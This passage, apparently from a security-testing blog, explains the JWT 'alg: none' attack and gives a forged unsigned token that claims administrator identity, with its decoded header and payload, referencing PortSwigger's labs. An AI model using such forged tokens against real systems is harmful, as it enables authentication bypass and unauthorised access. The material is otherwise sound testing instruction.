Modify the algorithm to none Change the “alg”: “none” and also delete the signature part but remember to leave the trailing dot after the payload and send the request to see if the none algorithm is working or not. Example: eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2NTY0MTczNDJ9. Header: eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0 { “typ”: “JWT”, “alg”: “none” } Payload: eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2NTY0MTczNDJ9 { “iss”: “portswigger”, “sub”: “administrator”, “exp”: 1656417342 } References: https://portswigger.net/web-security/jwt https://jwt.io/
A blog is all about cyber security, WAPT, VAPT, API Security Testing, Scripts, Automation and Random stuff